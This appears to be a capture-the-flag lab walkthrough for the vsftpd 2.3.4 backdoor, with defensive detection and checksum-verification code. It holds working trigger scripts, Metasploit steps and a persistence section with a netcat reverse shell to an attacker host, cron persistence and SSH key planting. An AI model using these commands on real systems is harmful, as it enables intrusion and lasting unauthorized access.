Anonymous 2

🔓 Can you exploit the hidden backdoor in this FTP server?

Easy · 03 Dec 2025 · Free Access · Solution Available

A seemingly innocent FTP server harbors a dark secret - a malicious backdoor inserted by attackers who compromised the official distribution. The vulnerability lies dormant, waiting for the right trigger to unleash remote access. 🎯 Time to discover how compromised software can become your gateway to system control!

1 Flag · 10 Points · 57% Success Rate
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.


🔓 Anonymous FTP 2 - Complete Backdoor Exploitation Solution

Objective: Exploit the vsftpd 2.3.4 backdoor vulnerability to gain remote shell access and retrieve the flag from the target system.

🔍 Step 1: Service Discovery and Enumeration

Begin by scanning the target to identify running services:

```shell
# Nmap service scan
nmap -Pn -sV -p21,6200 <target-ip>

# Expected output:
# 21/tcp open ftp vsftpd 2.3.4
# 6200/tcp filtered unknown
```

The scan reveals vsftpd 2.3.4 running on port 21. Port 6200 may appear filtered initially but becomes important later.

🔍 Step 2: Understanding the vsftpd 2.3.4 Backdoor

The vsftpd 2.3.4 backdoor was inserted by attackers who compromised the official distribution in July 2011. The backdoor is triggered when a username containing the string ":)" is used during FTP authentication.

Backdoor Mechanism:
• When username contains ":)", the backdoor activates
• Opens a shell listener on port 6200
• Provides direct system access without authentication
• The trigger check lives in str.c; the backdoor code itself is in sysdeputil.c (vsf_sysutil_extra function)

🔍 Step 3: Triggering the Backdoor

Connect to the FTP service and trigger the backdoor using a malicious username:

Using FTP Client

```
# Connect to FTP service
ftp <target-ip>

# When prompted for username:
Username: user:)
Password: anything

# The login will fail, but backdoor activates
```

Using Telnet

```
# Connect via telnet
telnet <target-ip> 21

# Send FTP commands:
USER user:)
PASS anything

# Connection may close, but backdoor is active
```

🔍 Step 4: Connecting to the Backdoor Shell

After triggering the backdoor, connect to the shell listener on port 6200:

Backdoor Shell Access:

```shell
telnet <target-ip> 6200
```

or

```shell
nc <target-ip> 6200
```

You should now have a shell prompt with system access.

🔍 Step 5: System Exploration and Flag Retrieval

Once connected to the backdoor shell, explore the system to locate the flag:

```shell
# Check current directory
pwd

# List files in current directory
ls -la

# Look for flag in common locations
find / -name "flag*" 2>/dev/null
find / -name "*.txt" 2>/dev/null | grep -i flag

# Check root directory
ls -la /root/

# Read the flag
cat /root/flag.txt
```

🔍 Step 6: Alternative Exploitation Methods

Using Metasploit
```
# Start Metasploit
msfconsole

# Use the exploit module
use exploit/unix/ftp/vsftpd_234_backdoor

# Set target
set RHOSTS <target-ip>

# Run exploit
exploit

# Get shell session
sessions -i 1
```

Python Script

```python
# Create exploit script
import socket
import time

# Trigger backdoor
s = socket.socket()
s.connect(('<target-ip>', 21))
s.sendall(b'USER user:)\r\n')
s.sendall(b'PASS pass\r\n')
s.close()

# Give the server a moment to open the listener (see the timing issue in Step 9)
time.sleep(2)

# Connect to shell
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))
```

Manual Verification

```shell
# Check if backdoor is active
nmap -Pn -p6200 <target-ip>

# Should show port 6200 as open
# after triggering the backdoor

# Connect immediately
nc <target-ip> 6200
```

🔍 Step 7: Understanding the Vulnerability Code

The trigger check in str.c and the backdoor function in sysdeputil.c (abbreviated here) show how the vulnerability works:

```c
// Trigger detection in str.c:
if((p_str->p_buf[i]==0x3a) && (p_str->p_buf[i+1]==0x29))
{
  vsf_sysutil_extra(); // Calls backdoor function
}

// Backdoor function in sysdeputil.c (abbreviated):
int vsf_sysutil_extra(void)
{
  int fd, rfd;
  struct sockaddr_in sa;
  // Creates socket on port 6200
  sa.sin_port = htons(6200);
  // Binds and listens
  // Accepts connections and spawns shell
  execl("/bin/sh","sh",(char *)0);
}
```

🔍 Step 8: Exploitation Timeline
  1. Connect to FTP: Establish connection to port 21
  2. Send Malicious Username: Use username containing ":)"
  3. Backdoor Activation: Server processes trigger and opens port 6200
  4. Shell Access: Connect to port 6200 for direct shell access
  5. Flag Retrieval: Navigate filesystem and locate flag file
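
The defender's view of the timeline above, as an added example that is not part of the lab walkthrough or the vsftpd code base: a small Python detector that mirrors the two-byte check from Step 7 against vsftpd's protocol log to find trigger attempts, and inspects `ss -ltn` output for the port 6200 listener described in Step 2. It assumes vsftpd was started with `log_ftp_protocol=YES` so each control-channel command is logged; the log lines and socket listing it scans are constructed samples, not real captures.

```python
"""Detection for the vsftpd 2.3.4 backdoor trigger.

Added example, not code from the lab or from the vsftpd project. It assumes
vsftpd was started with log_ftp_protocol=YES, so every control-channel
command is logged as: <date> [pid N] FTP command: Client "<ip>", "<command>".
The log lines and the `ss -ltn` output below are constructed for this demo.
"""
import re
from dataclasses import dataclass
from typing import Iterable, List

# Step 7's trigger compares two bytes, 0x3a 0x29 (":)"), so the detection
# rule mirrors that exact check instead of matching one fixed username.
TRIGGER = b"\x3a\x29"
BACKDOOR_PORT = 6200

FTP_CMD_RE = re.compile(
    r'^(?P<ts>.+?) \[pid \d+\] (?:\[[^\]]*\] )?'
    r'FTP command: Client "(?P<ip>[^"]+)", "(?P<cmd>.*)"$'
)


@dataclass
class Alert:
    timestamp: str
    client_ip: str
    username: str
    reason: str


def is_trigger(username: str) -> bool:
    """True if the USER argument contains the byte pair the backdoor checks."""
    return TRIGGER in username.encode("utf-8")


def scan_ftp_log(lines: Iterable[str]) -> List[Alert]:
    """Flag every USER command whose argument would fire the backdoor."""
    alerts = []
    for line in lines:
        m = FTP_CMD_RE.match(line.rstrip("\r\n"))
        if not m:
            continue  # CONNECT, OK LOGIN, transfer lines etc. are not commands
        verb, _, arg = m.group("cmd").partition(" ")
        if verb.upper() == "USER" and is_trigger(arg):
            alerts.append(Alert(m.group("ts"), m.group("ip"), arg,
                                "vsftpd 2.3.4 backdoor trigger ':)' in USER argument"))
    return alerts


def listener_on_backdoor_port(ss_output: str, port: int = BACKDOOR_PORT) -> bool:
    """Host-side check: does `ss -ltn` show a LISTEN socket on the backdoor port?

    Triggering the backdoor opens a listener on 6200 (Step 2); an FTP-only host
    with that port in LISTEN state is a strong indicator the trigger succeeded.
    """
    for line in ss_output.splitlines()[1:]:  # skip the header row
        fields = line.split()
        if len(fields) < 4 or fields[0] != "LISTEN":
            continue
        local_port = fields[3].rsplit(":", 1)[-1]
        if local_port.isdigit() and int(local_port) == port:
            return True
    return False


# Constructed sample input (not a real capture): one normal anonymous login
# and one trigger attempt from a second client.
SAMPLE_LOG = """\
Wed Dec  3 10:14:01 2025 [pid 2217] CONNECT: Client "10.0.0.5"
Wed Dec  3 10:14:02 2025 [pid 2216] FTP command: Client "10.0.0.5", "USER anonymous"
Wed Dec  3 10:14:02 2025 [pid 2216] FTP command: Client "10.0.0.5", "PASS <password>"
Wed Dec  3 10:14:02 2025 [pid 2216] [ftp] OK LOGIN: Client "10.0.0.5", anon password "?"
Wed Dec  3 10:15:40 2025 [pid 2231] CONNECT: Client "192.0.2.77"
Wed Dec  3 10:15:41 2025 [pid 2230] FTP command: Client "192.0.2.77", "USER user:)"
Wed Dec  3 10:15:41 2025 [pid 2230] FTP command: Client "192.0.2.77", "PASS anything"
"""

# Constructed `ss -ltn` listing of a host where the backdoor has been triggered.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      32     0.0.0.0:21        0.0.0.0:*
LISTEN 0      100    0.0.0.0:6200      0.0.0.0:*
"""

if __name__ == "__main__":
    for a in scan_ftp_log(SAMPLE_LOG.splitlines()):
        print(f"{a.timestamp} {a.client_ip} USER {a.username!r}: {a.reason}")
    print("backdoor listener present:", listener_on_backdoor_port(SAMPLE_SS))
```

Running it reports the single trigger attempt from 192.0.2.77 and the 6200 listener. The same rule belongs in a log pipeline or IDS signature: because the trigger is a fixed two-byte sequence on the control channel and the result is a new listening socket, both sides of this attack are loud to anyone who actually watches the FTP log and the host's listening ports.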

🔍 Step 9: Common Troubleshooting

| Issue | Cause | Solution |
| --- | --- | --- |
| Port 6200 not opening | Backdoor not triggered | Ensure username contains ":)" exactly |
| Connection refused on 6200 | Timing issue | Wait a few seconds after FTP login attempt |
| Shell not responsive | Connection timeout | Try multiple connection attempts |
| FTP login succeeds | Wrong vsftpd version | Verify target is running vsftpd 2.3.4 |

🔍 Step 10: Advanced Techniques

Automated Exploitation

```shell
# Bash one-liner
(echo 'USER user:)'; echo 'PASS pass'; sleep 2) | nc <target-ip> 21 && nc <target-ip> 6200
```

```python
#!/usr/bin/env python3
# Python automation
import socket, time
s = socket.socket()
s.connect(('<target-ip>', 21))
s.send(b'USER user:)\r\n')
s.send(b'PASS pass\r\n')
s.close()
time.sleep(2)
s2 = socket.socket()
s2.connect(('<target-ip>', 6200))
```

Persistence Techniques

```shell
# Once in shell, establish persistence
echo 'nc -e /bin/sh <attacker-ip> 4444' > /tmp/backdoor.sh
chmod +x /tmp/backdoor.sh

# Add to crontab
echo '* * * * * /tmp/backdoor.sh' | crontab -

# Or create SSH key
mkdir -p ~/.ssh
echo 'ssh-rsa AAAA...' > ~/.ssh/authorized_keys
```

🔍 Step 11: Flag Location and Extraction

The flag is typically located in the root directory:

Flag Extraction Commands:

```shell
# Navigate to root directory
cd /root

# List files
ls -la

# Read flag file
cat flag.txt

# Alternative search
find / -name "flag.txt" 2>/dev/null
cat $(find / -name "flag.txt" 2>/dev/null)
```

🔍 Step 12: Security Implications

This vulnerability demonstrates several critical security concepts:

  • Supply Chain Attacks: Compromised software distributions
  • Backdoor Persistence: Hidden access mechanisms in legitimate software
  • Network Service Exploitation: Leveraging service vulnerabilities for system access
  • Post-Exploitation: System exploration and data exfiltration
  • Detection Evasion: Backdoors designed to appear as normal functionality

🔍 Step 13: Remediation and Prevention

To prevent similar vulnerabilities:

  • Software Verification: Verify checksums and digital signatures
  • Source Code Auditing: Regular security code reviews
  • Network Monitoring: Monitor for unusual network connections
  • Patch Management: Keep software updated from trusted sources
  • Intrusion Detection: Deploy IDS/IPS to detect exploitation attempts
  • Least Privilege: Run services with minimal required privileges
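
To make the Software Verification point concrete, here is an added example in Python that is not code from the lab or from the vsftpd project. It checks a downloaded release against a published sha256sum-style digest list: it parses the list, streams the file through SHA-256, compares the digests in constant time, and fails closed for any file the list does not mention. It assumes the digest list (or its detached signature) was obtained from a channel independent of the mirror that served the tarball; the file names, contents and digest list used in demo() are constructed in a temporary directory.

```python
"""Verify a downloaded release against a published SHA-256 digest list.

Added example for the Software Verification point; not code from the lab or
the vsftpd project. It assumes the upstream project publishes a sha256sum-style
file ("<hex digest>  <filename>" per line) and that you fetched that file, or
its detached signature, from somewhere other than the mirror that served the
tarball. The files used in demo() are constructed in a temporary directory.
"""
import hashlib
import hmac
import tempfile
from pathlib import Path
from typing import Dict, Tuple

HEX = set("0123456789abcdef")


def parse_sums(text: str) -> Dict[str, str]:
    """Parse sha256sum output into {filename: hexdigest}; reject odd lines."""
    sums = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        digest, _, name = line.partition(" ")
        name = name.lstrip(" *")  # sha256sum writes " *name" in binary mode
        digest = digest.lower()
        if len(digest) != 64 or not set(digest) <= HEX or not name:
            raise ValueError(f"malformed digest line: {raw!r}")
        sums[name] = digest
    return sums


def sha256_file(path: Path, chunk_size: int = 1 << 20) -> str:
    """Stream the file through SHA-256 so large tarballs are not read at once."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_download(path: Path, sums: Dict[str, str]) -> Tuple[bool, str]:
    """Return (ok, reason). Files missing from the list fail closed."""
    name = path.name
    expected = sums.get(name)
    if expected is None:
        return False, f"{name}: not present in the published digest list"
    actual = sha256_file(path)
    if not hmac.compare_digest(actual, expected):
        return False, f"{name}: digest mismatch (expected {expected[:12]}..., got {actual[:12]}...)"
    return True, f"{name}: matches published digest"


def demo() -> Tuple[bool, bool, bool]:
    """Good file, same name with altered contents, and an unlisted file."""
    with tempfile.TemporaryDirectory() as d:
        tarball = Path(d) / "example-1.0.tar.gz"   # constructed, not a real release
        tarball.write_bytes(b"constructed release contents, not a real tarball\n")
        sums = parse_sums(f"{sha256_file(tarball)}  {tarball.name}\n")

        good, _ = verify_download(tarball, sums)

        # A mirror that appends code to the archive keeps the name but not the digest
        tarball.write_bytes(tarball.read_bytes() + b"appended by a compromised mirror\n")
        tampered, _ = verify_download(tarball, sums)

        other = Path(d) / "example-1.0-patched.tar.gz"
        other.write_bytes(b"anything\n")
        unlisted, _ = verify_download(other, sums)
    return good, tampered, unlisted


if __name__ == "__main__":
    print("good, tampered, unlisted =", demo())  # (True, False, False)
```

The digest list is only as trustworthy as the channel it came from: an attacker who controls the download site can replace the digest file along with the tarball, so pair this check with a detached-signature check against a maintainer key obtained out of band. That signature check is what exposed the 2011 vsftpd tarball, whose GPG signature did not verify.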

Historical Context: The vsftpd 2.3.4 backdoor was discovered in July 2011 and represents one of the most well-known examples of a compromised software distribution. The backdoor was inserted by attackers who gained access to the official download site.

Flag Retrieval: After successfully exploiting the backdoor and gaining shell access, the flag can be found in /root/flag.txt and should be submitted to complete the challenge.

Real-World Application: This challenge demonstrates realistic exploitation techniques used in penetration testing and red team exercises. The vsftpd backdoor remains a common target in CTF competitions and security training scenarios.